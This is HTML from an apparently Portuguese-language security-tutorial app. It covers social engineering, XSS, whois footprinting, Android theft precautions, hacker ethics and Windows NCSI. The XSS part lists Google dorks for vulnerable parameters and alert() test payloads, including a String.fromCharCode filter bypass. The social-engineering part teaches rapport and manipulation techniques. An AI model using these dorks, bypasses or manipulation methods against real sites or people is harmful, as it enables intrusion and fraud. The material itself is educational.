através de credenciais ou crachás falsos os quais são obtidos de forma persuasiva sobre o alvo ou por modelos buscados na internet (exemplo de consultas de crachás no Google). Uma contra-medida é utilizar os identificadores
de código de barra, controlando o acesso de alas específicas dentro da corporação de acordo com a função do empregado.
<br>
<br>Outra técnica muito comum é o <strong>Disfarce</strong>, que manipula através de um meio físico através de vestimentas (como um terno) se passando por uma entidade corporativa, isso devido a influência que traz
da roupa nivelando uma hierárquia dentro de um ambiente corporativo.
<br>
<br>
<br>Já o <strong>Dumpster Diving</strong> consiste em vasculhamento nos lixos em corporações na busca de informações (relatórios, contratos, grade de funcionários), ou qualquer dado revelante na empresa, muito
tratado no filme <em>Hacker 2 – Operação Takedown. </em>Uma contra-medida nesse caso é colocarem uma máquina de picotagem de lixo, uma vez triturado o lixo torna-se difícil recuperar a informação.
<br>
<br>
<br>Outro meio de busca de informações são através de <strong>Insiders</strong> que são empregados insatisfeitos e com ética duvidosa os quais podem passar informações de dentro da empresa, como acesso a rede interna.
Muitas vezes caracterizado também pelo empregado mal capacitado a qual repassam informações internas privilegiadas (documentos, acessos internos, credenciais) que são exemplo da espionagem industrial atualmente. Uma contra-medida
é adotar treinamentos qualificando o uso dos dados e controle das política de segurança na organização.
<br>
<br>
<br>
</p>
<h2><strong>Aspecto Sistêmico (exploração através de dispositivos tecnológicos)</strong></h2>
<p>Ataque mediante algum uso de dispositivo informático a fim de obter dados/informações da vítima, o qual usa-se técnicas que explora o desejo emocional da vítima (cobrança bancária ou produtos com preço baixo) aplicando técnicas
invasivas como phishing, pharming, spams, entre outros.</p>
<p><strong>– Spam:</strong> são os bombardeamentos de emails podendo ser de um remente falso ou real, é através dele que são distribuídos as demais técnicas de disseminação da engenharia social no meio eletrônico.
<br>
<br>
<br>
<strong>– Phishing/</strong><strong>pharming</strong>: utilizado muito em spams com a finalidade de redirecionar o alvo através de uma informação falsa para o servidor do atacante, capturando dados da vítima. Muito utilizado
em pessoas físicas como em cobranças falsas de contas, renovação de dados de imposto de rede, porém se aplica mais em alvos como empresa, como exemplo no envio de curriculum para o RH no qual utiliza-se a exploração das
vulnerabilidades via macro o qual permite a exploração do powershell via script dentro de arquivos de extensões de PDF, XLS, DOC, entre outros.
<br>
<br>
<br>
</p>
<h2>Virando um Engenheiro Social</h2>
<p>Para o desenvolvimento de habilidades relacionadas à engenharia social são indicadas técnicas de aperfeiçoamento no <em>face-to-face</em>, como o estudo da PNL (Programação Neuro Linguística) que se refere a forma
como as palavras podem atingir sua mente e produzir uma ação de forma intencional. Esse método também traz certas habilidades específicas como o desenvolvimento do <em>rapport</em> com a vítima, que força
a empatia com ela como forma de alcançar algum objetivo – alguns especialistas dizem que a PNL é balela porém outros apoiam o uso dessa técnica -. Outras técnicas que envolvem o engenheiro social na exploração física
é a leitura corporal que corresponde pela forma que a pessoa fala (entonação e vocabulário), o movimento corporal e microexpressões no qual você consegue interpretar ela de maneira correta e corresponder da mesma forma
para envolvimento e interação social para ganho de confiança, lembrando que a confiança que você adquire com a vítima é o laço mais forte para exploração da engenharia social.</p>
<p>Alguns <strong>livros</strong> interessantes para um estudo mais a fundo:</p>
<p>– Social Engineering: The Art of Human Hacking (inglês)
<br>– Mentira – Um Rosto De Muitas Faces
<br>– A Arte de Enganar
<br>– Não Minta Pra Mim! Psicologia e Linguagem Corporal
<br>– A Estrutura da Magia</p>
<h2>Como é encarado atualmente a Engenharia Social</h2>
<p>Nas práticas atuais, a engenharia social é mais utilizada em cenários de crimes, como o de estelionatário tendo como exemplo as ligações, mensagens premiadas, os <em>phishing</em> como já falado aqui. Outro lado
visto nela é o meio profissional que corresponde às habilidades que um <em>pentester</em> deve ter, que é muito utilizado por empresas (por mais que não seja visto e noticiado) realizadas nos pentests
físicos, sendo muito importante a utilização dela no meio empresarial para testar possíveis brechas a fim de não ter perdas ou vazamentos de informações.</p>
<h1>Conclusão</h1>
<p>A engenharia social é muito utilizada dentro de da espionagem industrial, visada muito pelos <em>Cracker</em>s. Não só atinge corporações, mas pessoas físicas que estão sujeitas a diversos tipos de infecções como nos exemplos
tratados aqui. Para evitar de ser uma vítima da engenharia social, deve se atender na educação digital básica, sabendo lidar com as informações do dia a dia tendo autonomia de suas atividades, sabendo quais serviços se
usa e qual recurso dela se limita em usar, para não ser enganado por alguma fraude recorrente disso. Nas organizações são tratadas com maior seriedade, pois o risco e os danos são maiores, para isso exige um investimento
específico com profissionais na área de segurança da informação, exercendo treinamentos qualificando/capacitando seus funcionários e adoção rígida as políticas de segurança.</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="XSS">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_240" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_462 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="bbogk_FJ"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_37_16">
<div class="tarea widget uib_w_241 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_241">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS) ocorre na aplicação web em que os parâmetros inseridos no servidor não são tratados devidamente, permitindo que
o usuário mal intencionado insira códigos (como em HTML e JavaScript) que manipulam instruções, como as estruturas de documentos HTML, roubo de sessões no sistema/credenciais, redirecionamento para sites maliciosos, entre
outras coisas.</p>
<p> </p>
<p>Listada como Top 10 das principais vulnerabilidades da OWASP, ela está/esteve presente dentro de grandes empresas como Rede Globo, Olhar Digital, GOL, Banco do Brasil, entre outras as quais muitas vezes acabaram ignorando essa
vulnerabilidade. A falha não só atinge sites comuns mas grande parte dos fóruns, devido a falta de filtro em que qualquer usuário comum pode incluir mensagens sem autorização, como instruções maliciosas para leitura de
informações específicas do usuário legítimo, tais como códigos de sessão e roubo de credenciais. Observe a imagem abaixo tirado do gráfico da Owasp, trazendo as informações gerais sobre o XSS.</p>
</div>
</div>
<div class="widget uib_w_242" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/XSSowasp-1024x380.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_243 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_243">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Outro exemplo de ataque que ocorre é devido a má implementação ou inexistência de um filtro para consultas de JavaScript que podem ser utilizadas para fazer redirecionamentos maliciosos (phishing). Esse script malicioso
pode simular o login de um site, capturando os valores digitados e redirecionando-os à um site falso para armazenar esses dados.</p>
<p>Dentro da vulnerabilidade XSS podemos destacar as principais ações de um atacante dentro de um vetor de ataque:</p>
<ul>
<li>O atacante pode criar uma URL com um script malicioso podendo abusar da credibilidade do site que é autêntico, enviando para uma vítima que poderá baixar e instalar o executável.</li>
</ul>
<ul>
<li>O atacante pode também, através de scripts, desconfigurar a página do site com mensagens e/ou imagens maliciosas que podem denegrir a imagem da instituição.</li>
</ul>
<ul>
<li>O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.</li>
</ul>
<h2><strong>Tipos de Ataques de XSS</strong></h2>
<p>Não existe uma forma única de classificar o tipo de XSS, pois algumas são classificadas de acordo com a falha causada pelo<em> lado do servidor (server side)</em> ou pelo <em>lado do cliente (client side)</em>.
Sendo assim, destacamos os tipos mais conhecidos como o <em>persistente, não persistente e baseado em DOM.</em>
</p>
<ul>
<li><strong>Persistente (Stored)</strong>
</li>
</ul>
<p>É quando o script injetado manipula alguma área no servidor podendo se alocar no banco de dados, num campo de pesquisa ou de comentários onde essa área infectada é acessada automaticamente entrando em funcionamento o script.
Uma consequência grave desse ataque é a criação de um usuário e a escalação de privilégio.</p>
<ul>
<li><strong> Não-Persistente (Reflected)</strong>
</li>
</ul>
<p>Ocorre quando usuário envia uma requisição durante uma consulta feita na página de pesquisa ou na variável. Geralmente são ataques sujeitos à engenharia social, como redirecionamento de página a qual convence a vítima que está
em uma conexão legítima, capturando dados sensíveis através de roubo de credenciais, sequestro de sessões, ou uso da conexão da vítima para realizar atividades arbitrárias.</p>
<ul>
<li><strong> Baseado em DOM</strong>
</li>
</ul>
<p>A falha é explorada pelo lado do cliente a partir dos objetos DOM (Document Object Model), sendo que sua manipulação é via código JavaScript. Esse caso são exemplos dos XSS que são inseridos scripts via payload numa determinada
variável.
</p>
<h2><strong>Identificando e explorando o XSS</strong></h2>
<p>Demonstraremos alguns exemplos para explorar a falha e analisá-la, executando testes manuais no site de teste da Acunetix, o qual podemos explorar e atacar sem problemas.</p>
<p>Podemos, através de um scanner como Nessus (outro outro que queira), encontrar a vulnerabilidade, porém pode causar muito barulho no alvo. Outro meio de localizar é através de <em>Dorks </em>que são strings as quais
utilizamos no Google para retornar buscas específicas (caso ainda não, viu leia o artigo aqui), e elas facilitam encontrar campos que possam estar vulneráveis, veja algumas <em>Dorks</em> abaixo:</p>
<p>
<br>
<em>inurl:”.php?query=”<br>
inurl:”.php?searchstring=”<br>
inurl:”.php?file=”<br>
inurl:”.php?txt=”<br>
inurl:”.php?tag=”<br>
inurl:”.php?author=”<br>
inurl:”.php?feedback=”<br>
inurl:”.php?cat=”</em>
</p>
<p>Pode-se também criar uma dork como exemplo: <em>inurl:”.php?search=” && inurl: http://testphp.vulnweb.com/ </em>a qual irá retornar para nós o campo de busca do nosso site para que possamos explorá-lo.</p>
<p>Pegaremos nosso alvo do site da Acunetix e iremos fazer dezenas de testes para verificar a existência de uma possível vulnerabilidade XSS, simulando algumas dificuldades que podem ser encontradas num processo de identificação.</p>
<p>Primeiro localize no site alvo algum local para inserção do script, seja um formulário de busca ou no própria URL. Usaremos um simples script em JS para verificar a existência de um possível XSS, a qual será inserida no formulário
de busca.</p>
<p><code><script>alert('Falha de XSS encontrada')</script></code>
</p>
</div>
</div>
<div class="widget uib_w_244" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/xss-1024x545.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="widget uib_w_245" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/11/xss2-1024x545.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_246 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_246">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Lembrando que as linguagens usadas nos scripts são executadas em plataforma web, tais como HTML e JS que são as mais comuns. Muitas vezes existem filtros nos formulários de busca, que não serão possíveis fazer request do script
com sucesso, sendo que teremos que fazer bypass neles, seja codificando o script ou injetando via GET (parâmetro enviado pela URL da página).</p>
<p>No exemplo abaixo, temos um script que inserimos o valor em Decimal 70, 65, 76, 72, 65, 95, 68, 69, 95, 88, 83, 83 que convertendo para String tem o valor da mensagem “FALHA_DE_XSS”. Caso queira criar uma mensagem
própria acesse a tabela ASCII aqui. Sendo uma boa forma de passar pelo filtro de busca.</p>
<p><code><script>alert(String.fromCharCode(70, 65, 76, 72, 65, 95, 68, 69, 95, 88, 83, 83))</script></code>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="Footprint_">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_231" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_232 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="voltar_g"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_38_77">
<div class="tarea widget uib_w_233 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_233">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Hoje iremos abordar sobre a técnica de arrecadamento de informações, conhecida como<em> Footprint</em>. Ela consiste em levantar o máximo de informações possíveis para mapear a estratégia de ataque num alvo. Veremos como
elaborar o passo a passo, os mecanismos e ferramentas utilizadas nesse processo para fazer uma coleta eficiente.</p>
<p> </p>
<p>O levantamento de informação está associado como a primeira fase do PenTest, onde precisamos estudar nosso alvo antes de iniciar qualquer ataque nele. Sendo assim, podemos tirar uma reflexão da frase abaixo.</p>
<blockquote>
<p><em>“Se eu tivesse 8 horas para cortar uma árvore, gastaria seis afiando meu machado – Abraham Lincoln”</em>
</p>
</blockquote>
<p>Utilizaremos um alvo qualquer, mas por questões de boa ética e de confidencialidade não colocaremos o nome do mesmo e o nome será trocado por <em>site-alvo (sendo assim assim os endereços de IPs foram todos alterados).</em>
</p>
<p>Antes de iniciar a prática, precisamos deixar claro as metas e objetivos a serem traçados no alvo, para criar um perfil dele para podermos atacá-lo futuramente. Para facilitar o entendimento do processo como um todo, deixei
um checklist abaixo tratando dos pontos necessários para levantamento das informações do nosso alvo. Lembrando que nem todas as vezes é possível arrecadar todas as informações do escopo abaixo, porém a eficiência vão de
suas técnicas e habilidades as quais demonstraremos alguns meios para que você consiga abstrair o máximo dessas informações.</p>
<ul>
<li>
<p>Levantamento de Informações de Domínios:</p>
<p>– Nomes de domínios.</p>
<p>– Responsáveis pelos domínios</p>
<p>– Servidores de domínios.</p>
</li>
<li>
<p>Identificação do S.O da máquina-alvo (footprint).</p>
</li>
<li>
<p>Descobrir subredes.</p>
</li>
<li>
<p>Serviços TCP e UDP disponíveis.</p>
</li>
<li>
<p>Topologia da rede.</p>
</li>
<li>
<p>Intervalos (Ranges) de IP de domínios.</p>
</li>
<li>
<p>Estrutura de segurança quanto a existência de:</p>
<p>– Firewalls</p>
<p>– Sistemas IDS/IPS</p>
<p>– Honeypots</p>
</li>
<li>
<p>Endereços de e-mails e contas de serviços (FTP).</p>
</li>
<li>
<p>Nomes de usuários e de grupos.</p>
</li>
<li>
<p>Banners que identificam versões de serviços.</p>
</li>
<li>
<p>Identificação de roteadores e tabelas de roteamento.</p>
</li>
<li>
<p>Servidores ocultos por NAT (Network Address Translator).</p>
</li>
</ul>
<p>Tendo em mente todas as informações a serem arrecadadas, vamos conhecer as ferramentas e técnicas para iniciar o processo de levantamento.</p>
<h2>Iniciando a prática do levantamento das informações</h2>
<p>O <em>Whois</em> é encontrado tanto em plataforma web quanto instalado em grande parte das distribuições Linux, com ele podemos fazer levantamento do proprietário do site, conseguir e-mail da host (que possivelmente
podemos iniciar ataque de engenharia social ou bruteforce), localização geográfica do servidor hospedado e uma lista de DNS associados.</p>
<p>Abra o terminal e digite o seguinte comando:</p>
<p><code># whois www.site-alvo.com.br</code>;
</p>
</div>
</div>
<div class="widget uib_w_234" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/12/1-1024x576.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_235 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_235">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Veja que conseguimos extrair diversas informações de quem é o responsável pelo domínio e os nomes dos servidores. Outra forma é ir no site no NICBR e fazer a consulta que ele trará também as mesmas informações da
host (lembre-se que a NICBR é brasileira então só puxará informações de domínios referente ao Brasil).</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_TRES">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_251" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_252 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btn_oou"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_72_7">
<div class="tarea widget uib_w_253 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_253">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<h2>Introdução</h2>
<p>Todos sabemos que atualmente devices mobile são os mais utilizados em todo o mundo. Por exemplo, no Brasil, já há mais celulares que número de habitantes [1], e isso vem desde por volta de 2012.</p>
<p>Muitos dos serviços que utilizamos também estão presentes nos smartphones, e talvez surpreenda, mas são mais utilizados por eles, como redes sociais, internet banking, e-mails, portais de notícias e por ai adiante. Sendo assim,
projetos de pesquisas a respeito deles estão cada vez mais frequentes [2] [3].</p>
<p>Muitas de nossas informações estão em nossos smartphones, logo é bom ter planos para caso ele fuja de sua mão, seja por perda, furto ou roubo. Portanto, é bom pensarmos nisso e vamos lá!</p>
<p> </p>
<blockquote>
<p>OBS: Esse é um artigo diretamente relacionado à dispositivos Android, mas aparelhos Apple tem tecnologias semelhantes, então, pode-se pesquisar por tais técnicas para seu gadget caso prefira.</p>
</blockquote>
<h2>Backup</h2>
<p>Primeiro passo para tudo que se vai fazer é ter backup. Dispositivos Android são bem servidos com isso, uma vez que as fotos e vídeos você pode fazer upload automaticamente pelo próprio aplicativo Fotos do Google. Outras
informações também é possível se ter, como por exemplo a lista de contatos, informações sobre APPs e demais.</p>
<p>Uma dica bacana é você ter uma conta separada apenas para esse tipo de serviço. Assim, você terá mais espaço de armazenamento e risco de perder menos informações caso uma das contas seja comprometida.</p>
<h3>Fotos e Vídeos</h3>
<p>Siga o passo-a-passo para ativar essa funcionalidade:</p>
<p>Instale o aplicativo Fotos.</p>
<p>Na tela de inicialização ele já mostra as opções:</p>
</div>
</div>
<div class="widget uib_w_254" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://i.imgur.com/7sElqDX.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_255 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_255">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Depois ele lhe dá duas opções: converter as mídias para boas resoluções mas com tamanhos reduzidos ou enviar o arquivo sem alteração. Neste momento, fica a seu critério. Após isso, já irá mostrar as fotos que você tem no aplicativo
ou tudo em branco com dicas de uso.</p>
<p>Vá pelo menu esquerdo até a aba “Configurações” e logo a primeira opção se trata do Backup e sincronização. Vamos entrar nessa parte. Então basta ler as opções e marcar como bem preferir. São bem intuitivas e explicar todas
aqui não seria um bom modo.</p>
<h3>Demais Dados</h3>
<p>Aqui vamos tratar dos seus contatos, eventos marcados no calendário, configurações de aplicativos e por aí vai…</p>
<p>Vá para a “Configurações” e procure por “Backup e restauração” (ou alguma opção parecida). Aqui poderá escolher a conta para fazer esse backup e marcando ou não as opções de backup das informações e restauração automática das
configurações quando reinstala um aplicativo, você poderá habilitar ou desabilitar, respectivamente, essas funções.</p>
<p>Voltando para o menu de Configurações, haverá uma parte para Contas, e nela um ícone para gerenciar as contas do Google, clique nele. Aqui você dispõe de algumas opções referentes também à sua privacidade.</p>
<p>Clicando na conta cadastrada haverá opções para sincronização; basta, então, você marcar apenas os itens que lhe desejar.</p>
<h2>Precaução</h2>
<p>Nessa parte será abordada opções para caso não tenha mais o celular, dificulte a outra pessoa ter acesso à seus dados.</p>
</div>
</div>
<div class="widget uib_w_256" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://i.imgur.com/2IdEStM.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
<div class="tarea widget uib_w_257 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_257">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Vamos novamente para a página inicial das Configurações e entrar no item “Segurança”. Parecida com as recomendações de senhas padrões (inserir letras, números e caracteres especiais…), para dispositivos mobile valem das mesmas
regras em essência, que é: inserir senhas difíceis para as pessoas mas fáceis para você de lembrar. Por exemplo, caso utilize o padrão de desenho, escolha movimentos que lhe lembre de algo, como uma tatuagem tribal e lembre-se
de não deixar o desenho visível. Se for usar desbloqueio facial, é bom habilitar opções de reconhecimento de olhos piscando e também bom fazer uma leve careta ou expressão no momento do reconhecimento.. E caso seja por
dígitos, utilize das mesmas regras padrões.</p>
<p>Habilitar a questão de bloqueio automático é uma boa também, pois pense que está num café utilizando o celular, deixa-o de lado por um instante, sai e esquece o gadget lá, destravado. Para uma pessoa que o pegar, seria balela
fazer o que quiser. Se ele bloquear em cinco segundos, já dificulta um pouco isso.</p>
<p>Exibir uma informação do proprietário pode até ser bom caso confie no caráter das pessoas e creia que caso ela encontre seu celular, busque por você para devolvê-lo.</p>
<p>A opção de encriptar seu dispositivo também é ótima para caso perca seu celular. Assim, sempre que ligá-lo, terá que colocar uma senha para utilizar as informações que ali tiver. Isso não quer dizer que não possa utilizar o
celular. Fazendo uma restauração pode-se ter acesso ao dispositivo, só não terá suas informações lá, o que é importante.</p>
<p>As demais opções pode deixar nas configurações padrões ou mude para o que desejar, é bom fuçar e testar um pouco.</p>
<h2>Pós Perda</h2>
<p>Caso já não tenha mais o celular em mãos, é importante que faça certos procedimentos, vamos ver então.</p>
<p>Assim que puder, faça logo um Boletim de Ocorrência! Em caso de perda ou furto, pode-se fazer em sistemas de delegacia virtual, caso seu estado tenha essa possibilidade. Senão e em casos de roubo, apenas na delegacia mais próxima
do local ocorrido. Isso é importante para caso ainda utilizem suas informações, você ter álibi para provar sua inocência quanto ao caso.</p>
<p>Após feito o B.O. (ou caso não tenha chance ainda) bloqueie seus números telefônicos e seu celular pelo IMEI (já mostro como ter isso). Basta ligar para o atendimento de sua operadora, seguir as opções e informar seu número.
Por padrão o atendente deverá pedir algumas informações “por questões de segurança”. Para realizar o bloqueio do número, basicamente precisará apenas dele, nome completo e CPF do titular da linha. Para bloquear o celular
a distância vai precisar do código IMEI.</p>
<p><strong>É importante sempre anotar e salvar os protocolos das ligações e procedimentos realizados ao menos até a poeira baixar e resolver todos esses problemas.</strong>
</p>
<blockquote>
<p><strong>IMEI</strong>
</p>
<p>É um código único por dispotivo, utilizado para identificar o mesmo em todo o mundo. Para descobrir o código IMEI, apenas tecle *#06# em seu dispositivo e guarde o número que aparece em local seguro e que possa
ser facilmente acessado caso precise.</p>
<p>Mais informações em [4] e [5].</p>
</blockquote>
<p>Troque as senhas de suas contas que estavam cadastradas em seu smartphone. Há, na maioria dos sites, opções para deslogar de todos os dispositivos conectados, isso é importante para esses momentos.</p>
<h3>Google Android Device Manager</h3>
<p>Esse é um serviço que disponibiliza para que você faça algumas coisas interessantes, como:</p>
<ul>
<li>Fazer tocar o celular (bacana para caso de ter perdido em casa, por exemplo)</li>
<li>Bloquear (você pode colocar um texto na tela pedindo para que entrem em contato com você)</li>
<li>Apagar tudo (vai zerar suas informações que tiver no celular)</li>
<li>Rastrear seu dispositivo</li>
</ul>
<p>Para isso funcionar o celular precisa está conectado à internet. E para a opção de rastreio, precisa também do GPS ativado.</p>
<p>Também há um aplicativo para uso do serviço. Já que você pode interconectar seus dispositivos apenas com uma conta, isso é bacana para poder gerenciar ainda mais rápido, caso precise.</p>
<p>Como não há com o que se estender nesse tema e para não alongar mais o artigo, vou deixar um link de referência do próprio Google [6] caso queira ativar esse recurso.</p>
<ul>
<li>Link do Serviço</li>
<li>Link do Aplicativo</li>
</ul>
<h2>Conclusão</h2>
<p>Finalizamos aqui então algo importante de se saber. Caso tenha o extravio de seu smartphone, claro que o dano é irreversível, mas é possível que seja amenizado. Em um mundo onde o que vale mais são as informações, tê-las protegidas
nunca é ser paranoico demais.</p>
<p>Fazendo esses passos, você já diminuirá as chances de ser prejudicado caso tenha seus dispositivos perdidos. Imagine o que não causaria se aquele seu nude parasse como foto de perfil do WhatsApp colocado por um criminoso um
pouco zueiro?!</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_QUATRO">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_259" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_260 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="back_info"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_65_73">
<div class="tarea widget uib_w_261 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_261">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>O <em>Ethical Hacking</em> (conhecido como “ética hacker”) é muito confundido em sua definição atual, criando uma bifurcação entre profissionais de segurança da informação e a comunidade hacking.
Em sua real definição o ethical hacking trata de valores morais e filosóficos empregado dentro da comunidade hacker, não se limitando apenas na ética humana, mas em valores trazidos
ao longo da cultura e do desenvolvimento tecnológico.</p>
<p> </p>
<p>Os aspectos pregados pelo <em>ethical</em><em> hacking</em> não só viabiliza as condutas sobre determinada práticas, mas difere o meio que a tecnologia é provida no desenvolvimento
da sociedade, ignorando qualquer sistema meritocrático, ou de regimes impostos pela sociedade.</p>
<p>Portanto, acaba se dividindo em duas visões, a qual citaremos a pioneira que se originou a comunidade hacking, e a atual que se baseia dentro muitos nos profissionais de segurança da informação.
A pioneira trata dos valores agregados na cultura da comunidade do software livre, vista no compartilhamento livre da informação sem privatização da informação. E a atual se refere apenas ao uso do termo da ética dentro
de um contexto ou ambiente a qual se lida, baseado em fundamentos morais vista pela sociedade como exemplo dos parâmetros do “certo” e “errado”.</p>
<h2>Navegando na história, desvendando a origem filosófica.</h2>
<p>A origem do <em>ethical hacking</em> é agregada a cultura hacker, a qual se fundamentou na década 50 e 60 no MIT (Instituto de Tecnologia de Massachusetts) envolvida pela comunidade do software
livre, que pregava a liberdade de expressão e desenvolvimento da tecnologia na melhoria de vida da sociedade. Uma das definições que se fundamenta a ética hacker é formalizada pelo pioneiro Steven
Levy, escritor do livro <em>Hackers: Heroes of the Computer Revolution</em> publicado em 1984, que trata a ética hacker como a liberdade de expressão em benefício da sociedade
<br>
<br>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_CINCO">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_262" data-uib="layout/header" data-ver="0">
<h2>SEGURANÇA DA INFO.</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
<button class="btn widget uib_w_263 d-margins btn-info" data-uib="twitter%20bootstrap/button" data-ver="1" id="btnvinte"><i class="glyphicon glyphicon-chevron-left button-icon-left" data-position="left"></i>
</button>
</div>
<div class="widget-container content-area horiz-area wrapping-col right"></div>
</div>
<div class="upage-content ac0 content-area vertical-col left" id="page_75_93">
<div class="tarea widget uib_w_264 d-margins tte" data-uib="media/text" data-ver="0" name="uib_w_264">
<div class="widget-container left-receptacle"></div>
<div class="widget-container right-receptacle"></div>
<div class="text-container">
<p>Sempre que ligamos o Windows, um teste de conexão é feito automaticamente através do NCSI (Network Connectivity Status Indicator). O computador faz uma requisição de um arquivo de texto no servidor do NSCI em que o Windows
pode identificar quando o computador está conectado em uma rede, quando precisa de senha para alguns tipos de rede sem fio e quanto está conectado à internet.</p>
<p> </p>
<p>O NCSI facilita a verificação de problemas na conexão, permitindo que uma ajuda mais precisa seja fornecida para usuários básicos. O Windows tenta resolver o domíniowww.msftncsi.com e ler o arquivo http://www.msftncsi.com/ncsi.txt,
que é um arquivo de texto puro com o texto “Microsoft NCSI”. Numa outra verificação ele faz um dns lookup no dns.msftncsi.com e compara com o IP previamente armazenado nele. Se as coisas não baterem, sinal de que há algum
problema na conexão então aparece a mensagem “sem acesso a internet” ou algo parecido.</p>
<p>Ou seja, sempre que o Windows tenta se conectar a um servidor da Microsoft, seu IP fica armazenado nos logs da Microsoft em uma conexão descriptografada.</p>
<p>A microsoft explica que esses IPs não são usados para identificar os usuários, em muitos casos, eles são os endereços de um NAT (network address translation) ou um servidor proxy e não o cliente por trás disso tudo.</p>
<p>Caso queira bloquear isso:</p>
<p>Abra o Regedit (Iniciar > regedit)</p>
<p>Vá até HKEY_LOCAL_MACHINE > SYS</p>
<p>TEM > CurrentControlSet > Services > NLaSvc > Paramenters > Internet</p>
<p>A direita procure por EnableActiveProibing e altere o valor para 0</p>
</div>
</div>
<div class="widget uib_w_265" data-uib="media/img" data-ver="0">
<figure class="figure-align">
<img src="http://cienciahacker.com.br/wp-content/uploads/2015/06/microsoft.png">
<figcaption data-position="bottom"></figcaption>
</figure>
</div>
</div>
</div>
</div>
<div class="upage hidden back" id="VINTE_SEIS">
<div class="upage-outer">
<div class="uib-header header-bg container-group inner-element uib_w_267" data-uib="layout/header" data-ver="0">
<h2>DOS/DDOS</h2>
<div class="widget-container wrapping-col single-centered"></div>
<div class="widget-container content-area horiz-area wrapping-col left">
